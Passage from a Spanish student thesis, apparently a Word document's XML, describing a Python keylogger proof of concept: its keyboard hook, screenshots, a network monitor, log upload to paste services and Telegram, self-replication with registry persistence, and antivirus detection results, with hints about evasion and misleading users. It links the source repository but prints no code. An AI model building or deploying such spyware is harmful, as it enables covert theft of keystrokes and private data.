      <w:bookmarkStart w:id="276" w:name="_Toc18453540"/>
      <w:bookmarkStart w:id="277" w:name="_Toc19810102"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Esquema del programa y grafico de llamadas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
      <w:bookmarkEnd w:id="277"/>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682109" w:rsidRDefault="00682109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00582FBA" w:rsidRDefault="00682109" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="029CBF13" wp14:editId="525AE018">
            <wp:extent cx="5400040" cy="39960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monsey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996055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00682109" w:rsidRDefault="00582FBA" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="_Toc19358262"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Gráfico de llamadas entre funciones.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w:rsidR="00582FBA" w:rsidRDefault="00582FBA" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B2332F" w:rsidRDefault="00B2332F" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">A grosso modo el flujo del programa, sin entrar en detalle, vendría a ser como el esquema que se muestra en la siguiente ilustración, donde se resaltan dos procesos en color, el Servidor de escucha en red (azul) y el Hook de teclado (verde). Estos procesos, una vez iniciados, funcionan como procesos independientes en paralelo.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5ED0" w:rsidRDefault="008E5ED0" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>El Servidor queda a la espera de recibir un mensaje de identificación por parte del monitor. Si se recibe el mensaje correcto, establece los parámetros de la ip de respuesta y activa el flag de envio al monitor, para que el proceso de eventos de teclado sepa que tiene que enviar los datos al monitor además de registrarlos en el fichero de disco.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5ED0" w:rsidRDefault="008E5ED0" w:rsidP="00582FBA">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>El Hook de eventos asigna una función (que varía dependiendo del módulo empleado) que se encargara de registrar cada tecla, procesarla y guardarla en el string de memoria, y posteriormente guardar en disco o tomar la captura de pantalla si procede.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2471" w:rsidRDefault="00B2332F" w:rsidP="00CC2471">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0353C84D" wp14:editId="4037D258">
            <wp:extent cx="4856400" cy="3916800"/>
            <wp:effectExtent l="114300" t="114300" r="135255" b="1409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647" t="1589" r="1575" b="2457"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4856400" cy="39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332F" w:rsidRDefault="00CC2471" w:rsidP="00CC2471">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc19358263"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>124</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Esquema del flujo general del keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p w:rsidR="00CC2471" w:rsidRDefault="00CC2471" w:rsidP="00CC2471">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F523E" w:rsidRPr="00CC2471" w:rsidRDefault="007F523E" w:rsidP="00CC2471">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A465F6" w:rsidRDefault="00A465F6" w:rsidP="003D5DB7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="_Toc19810103"/>
      <w:r>
        <w:t>Generación del ejecutable</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
    </w:p>
    <w:p w:rsidR="00A465F6" w:rsidRDefault="00A465F6" w:rsidP="00A465F6">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hay que tener en cuenta, que Python es un lenguaje interpretado multiplataforma, y como tal, la ejecución de cualquier aplicación desarrollada en este lenguaje implica que el sistema debe de tener instalado el intérprete de este lenguaje. Para probar la funcionalidad general del keylogger se puede hacer directamente con el intérprete, pero si se desea que funcione como programa autónomo y aprovechando todas sus características, este debe de convertirse en un ejecutable (.exe). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F523E" w:rsidRDefault="00A465F6" w:rsidP="00A465F6">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Para ello se ha utilizado la herramienta PyInstaller</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1537042623"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION PyI \l 3082 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[91]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> que se encarga de empaquetar todo el contenido sobre un solo fichero ejecutable.</w:t>
      </w:r>
      <w:r w:rsidR="00E34DEA">
        <w:t xml:space="preserve"> Esto no es un proceso de compilación enlazado como se haría en otros lenguajes</w:t>
      </w:r>
      <w:r w:rsidR="007F523E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E34DEA">
        <w:t xml:space="preserve"> como C, puesto que se encarga de incorporar todas las librerías necesarias más el intérprete del propio Python dentro de un ejecutable junto </w:t>
      </w:r>
      <w:r w:rsidR="007F523E">
        <w:t>con el programa precompilado a un código intermedio. Esto hace que los ejecutables generados sean de un considerable tamaño respecto a otros lenguajes de programación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F523E" w:rsidRDefault="007F523E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D5DB7" w:rsidRDefault="00251FF5" w:rsidP="003D5DB7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="_Toc19810104"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>¿Se detecta como malware?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BF6B1B">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BF6B1B">
            <w:instrText xml:space="preserve"> CITATION Vir5 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BF6B1B">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[92]</w:t>
          </w:r>
          <w:r w:rsidR="00BF6B1B">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> del código que hemos desarrollado y la respuesta es que </w:t>
      </w:r>
      <w:r w:rsidR="00F51E88">
        <w:t>sí, es considerado como malware. No obstante, solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 motores de los 69</w:t>
      </w:r>
      <w:r w:rsidR="00F51E88">
        <w:t xml:space="preserve"> que han efectuado el análisis han dado positivo en las fechas en que se ha estado confeccionando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> esta memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF6B1B" w:rsidRDefault="003D5DB7" w:rsidP="00BF6B1B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="388D3F6E" wp14:editId="1DC7380E">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bookmarkStart w:id="282" w:name="_Toc19358264"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>125</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Detección de demonseye.exe como malware.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>
    </w:p>
    <w:p w:rsidR="00D25559" w:rsidRDefault="00F51E88" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esta aplicación no lleva incorporada ninguna medida de ocultación ni evasión de antivirus, por lo que es evidente que aplicando ciertos métodos podría llegar a pasar totalmente como una aplicación </w:t>
      </w:r>
      <w:r w:rsidR="00570EC5">
        <w:t>inocua</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F51E88" w:rsidRDefault="00F51E88">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00231F20">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="283" w:name="_Toc18453541"/>
      <w:bookmarkStart w:id="284" w:name="_Toc19810105"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Implantación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
      <w:bookmarkEnd w:id="283"/>
      <w:bookmarkEnd w:id="284"/>
    </w:p>
    <w:p w:rsidR="00D6075F" w:rsidRDefault="00D6075F" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:bookmarkStart w:id="285"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F51E88" w:rsidRDefault="00F51E88" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esto no es un síntoma de aplicación maliciosa. Hay muchas aplicaciones </w:t>
      </w:r>
      <w:r w:rsidR="001E7E7C">
        <w:t>no maliciosas que podrían dar este mismo aviso, por lo que en ciertas circunstancias el usuario mismo podría ser engañado o aceptar el mismo el permiso sin darle más importancia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D6075F" w:rsidRDefault="00FC6AF3" w:rsidP="00FC6AF3">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC6AF3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EBE236F" wp14:editId="5F625BEC">
            <wp:extent cx="3762000" cy="2700000"/>
            <wp:effectExtent l="133350" t="114300" r="124460" b="1581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898" t="1587" r="1336" b="1973"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3762000" cy="270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86" w:name="_Toc19358265"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>126</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Alerta de seguridad de Windows que aparece cuando un programa accede a la red.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>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1E7E7C" w:rsidRDefault="001E7E7C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00FF6DC1">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="287" w:name="_Toc18453542"/>
      <w:bookmarkStart w:id="288" w:name="_Toc19810106"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Problemas, soluciones y m</w:t>
      </w:r>
      <w:r w:rsidR="00231F20" w:rsidRPr="00853E9A">
        <w:t>ejoras posibles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
      <w:bookmarkEnd w:id="287"/>
      <w:bookmarkEnd w:id="288"/>
    </w:p>
    <w:p w:rsidR="007B5B02" w:rsidRDefault="00AB2720" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:bookmarkStart w:id="289"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w:t>
      </w:r>
      <w:r w:rsidR="001E7E7C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AB2720">
        <w:t xml:space="preserve"> en la g</w:t>
      </w:r>
      <w:r w:rsidR="001E7E7C">
        <w:t>eneración del ejecutable se están</w:t>
      </w:r>
      <w:r w:rsidR="00AB2720">
        <w:t xml:space="preserve"> incluyendo muchas funciones innecesarias que se incorporan por defecto. En otros lenguajes, como C, por ejemplo, es muy probable que este ejecutable no superara los 500 Kbs, pero algunas de las funciones realizadas hubieran llevado más tiempo implementarlas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E7E7C" w:rsidRDefault="001E7E7C" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Por lo tanto, el intentar reducir el número de módulos e implementar algunos de los procesos </w:t>
      </w:r>
      <w:r w:rsidR="00146AC8">
        <w:t>mediante otros métodos podría llegar a reducir el tamaño final del ejecutable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146AC8" w:rsidRDefault="008E22C8" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Es probab</w:t>
      </w:r>
      <w:r w:rsidR="000F0BC2">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>e que u</w:t>
      </w:r>
      <w:r w:rsidR="00146AC8">
        <w:t>tilizar la librería ctypes</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1961554484"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00146AC8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00146AC8">
            <w:instrText xml:space="preserve"> CITATION Pyt \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00146AC8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[93]</w:t>
          </w:r>
          <w:r w:rsidR="00146AC8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00146AC8">
        <w:t xml:space="preserve"> que proporciona acceso directo a llamadas de las DLL de Windows </w:t>
      </w:r>
      <w:r>
        <w:t>contribuyera a la reducción del tamaño del ejecutable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B5B02" w:rsidRDefault="00020DFE" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Otro </w:t>
      </w:r>
      <w:r w:rsidR="007B5B02">
        <w:t xml:space="preserve">problema </w:t>
      </w:r>
      <w:r w:rsidR="00570EC5">
        <w:t xml:space="preserve">es el </w:t>
      </w:r>
      <w:r w:rsidR="007B5B02">
        <w:t>de los caracteres acentuados</w:t>
      </w:r>
      <w:r w:rsidR="00570EC5">
        <w:t>, que aun usando la librería pynput no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se soluciona del todo, pues falla con otros caracteres especiales como el acento circunflejo. Este es un problema que quizás solo se soluciona con alguna función a más bajo nivel, o a lo mejor usando la citada librería ctypes ayudaría a resolver el problema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00020DFE" w:rsidRDefault="00B23F26" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>El uso de threads también se puede mejorar, ya que en este desarrollo se ha usado para el servidor y el envío de las capturas de pantalla, pero también se podría hacer para el envío del fichero de registro de teclas a los servicios de paste y el link a Telegram, pues, aunque es un proceso muy rápido y que en condiciones normales no ralentiza la entrada del teclado, si fallara la conexión a internet en este punto si podría apreciarse un comportamiento extraño del sistema revelando la presencia del keylogger.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F71445" w:rsidRDefault="00F71445" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="007D1449">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="_Toc18453543"/>
      <w:bookmarkStart w:id="291" w:name="_Toc19810107"/>
      <w:r>
        <w:t>Código fuente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="289"/>
      <w:bookmarkEnd w:id="290"/>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w:rsidR="00B32917" w:rsidRDefault="00B32917" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Todo el código fuente y documentación de dicho keylogger puede encontrarse en el siguiente repositorio de GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32917" w:rsidRDefault="008400F5" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:hyperlink r:id="rId139" w:history="1">
        <w:r w:rsidR="00B32917" w:rsidRPr="006807B5">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/gabimarti/Demons-eye-keylogger</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B32917" w:rsidRDefault="00B32917" w:rsidP="00753A4B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pP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0D4C99" w:rsidP="00550235">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="292" w:name="_Toc421702488"/>
      <w:bookmarkStart w:id="293" w:name="__RefHeading___Toc1102_228935268"/>
      <w:bookmarkStart w:id="294" w:name="_Toc18453544"/>
      <w:bookmarkStart w:id="295" w:name="_Toc19810108"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidR="00231F20" w:rsidRPr="00853E9A">
        <w:t xml:space="preserve"> final</w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
      <w:bookmarkEnd w:id="293"/>
      <w:bookmarkEnd w:id="294"/>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w:rsidR="00C147F3" w:rsidRDefault="00C147F3" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El keylogger desarrollado </w:t>
      </w:r>
      <w:r w:rsidR="000D4C99">
        <w:t xml:space="preserve">funciona </w:t>
      </w:r>
      <w:r w:rsidR="00756CF2">
        <w:t xml:space="preserve">como tal tanto usado con el intérprete, como empaquetado dentro de un ejecutable. La única función que no se puede llevar a cabo desde el intérprete es la de replicado del ejecutable (porque no existe) y añadirse al registro de Windows para que se ejecute manualmente al iniciar el sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756CF2" w:rsidRDefault="00756CF2" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>El monitor puede funcionar sin limitaciones en cualquiera de las dos formas, directamente interpretado, o empaquetado como ejecutable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756CF2" w:rsidRDefault="00756CF2" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>Teniendo en cuenta que es un POC y su uso es exclusivamente didáctico y personal, no tiene que envidiar nada en cuanto a funcionalidad a cualquiera de los keyloggers que hemos probado y analizado que se ofrecen como aplicaciones gratuitas o comerciales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756CF2" w:rsidRDefault="00756CF2" w:rsidP="00F71445">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A75801" w:rsidRDefault="00A75801">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00231F20" w:rsidP="00550235">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="296" w:name="_Toc421702489"/>
      <w:bookmarkStart w:id="297" w:name="__RefHeading___Toc1104_228935268"/>
      <w:bookmarkStart w:id="298" w:name="_Toc18453545"/>
      <w:bookmarkStart w:id="299" w:name="_Toc19810109"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Coste del proyecto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
      <w:bookmarkEnd w:id="297"/>
      <w:bookmarkEnd w:id="298"/>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w:rsidR="00B029AB" w:rsidRPr="00853E9A" w:rsidRDefault="00231F20">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="300" w:name="_Toc421702490"/>
      <w:bookmarkStart w:id="301" w:name="__RefHeading___Toc1106_228935268"/>
      <w:bookmarkStart w:id="302" w:name="_Toc18453546"/>
      <w:bookmarkStart w:id="303" w:name="_Toc19810110"/>
      <w:r w:rsidRPr="00853E9A">
        <w:t>Coste temporal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="300"/>
      <w:bookmarkEnd w:id="301"/>
      <w:bookmarkEnd w:id="302"/>
      <w:bookmarkEnd w:id="303"/>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A75801" w:rsidRDefault="00A75801" w:rsidP="00B02DEE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D47D08" w:rsidRDefault="00163424" w:rsidP="00B02DEE">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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F254EE" w:rsidRPr="00F254EE" w:rsidTr="00F254EE">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F254EE" w:rsidRPr="00F254EE" w:rsidRDefault="00064628"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center"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F254EE" w:rsidRPr="00F254EE" w:rsidTr="00F254EE">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3,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0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96,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5,39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81,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1,4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10,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76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65,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7,11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78,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0,53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5,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71 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F254EE" w:rsidRPr="00F254EE" w:rsidTr="00F254EE">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 xml:space="preserve">38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00,00 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B02DEE" w:rsidRDefault="00BA4BA9" w:rsidP="00F254EE">
      <w:pPr>
        <w:pStyle w:val="Descripcin"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:bookmarkStart w:id="304" w:name="_Toc19810128"/>
      <w:r>
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
